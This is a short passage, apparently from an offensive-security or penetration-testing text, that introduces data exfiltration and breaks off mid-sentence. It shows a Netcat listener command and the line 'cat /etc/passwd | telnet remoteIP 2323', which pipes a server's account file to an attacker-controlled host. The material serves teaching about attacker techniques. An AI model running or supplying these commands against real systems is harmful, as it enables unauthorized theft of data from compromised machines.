The unauthorized transfer of digital data from any environment is known as exfiltration of data (or extrusion of data). Once persistence is maintained on a compromised system, a set of tools can be utilized to exfiltrate data from highly secure environments.
In this section, we will explore different methods that attackers utilize to send files from internal networks to attacker-controlled systems.
Firstly, we will discuss some easy techniques to quickly grab files when access to compromised systems is time-limited. Attackers can simply open up a port using Netcat by running
nc -lvp 2323 > Exfilteredfile, and then run
cat /etc/passwd | telnet remoteIP 2323 from the compromised Linux server.
Another important and fairly simple technique used by attackers with access to any system on the network is to run...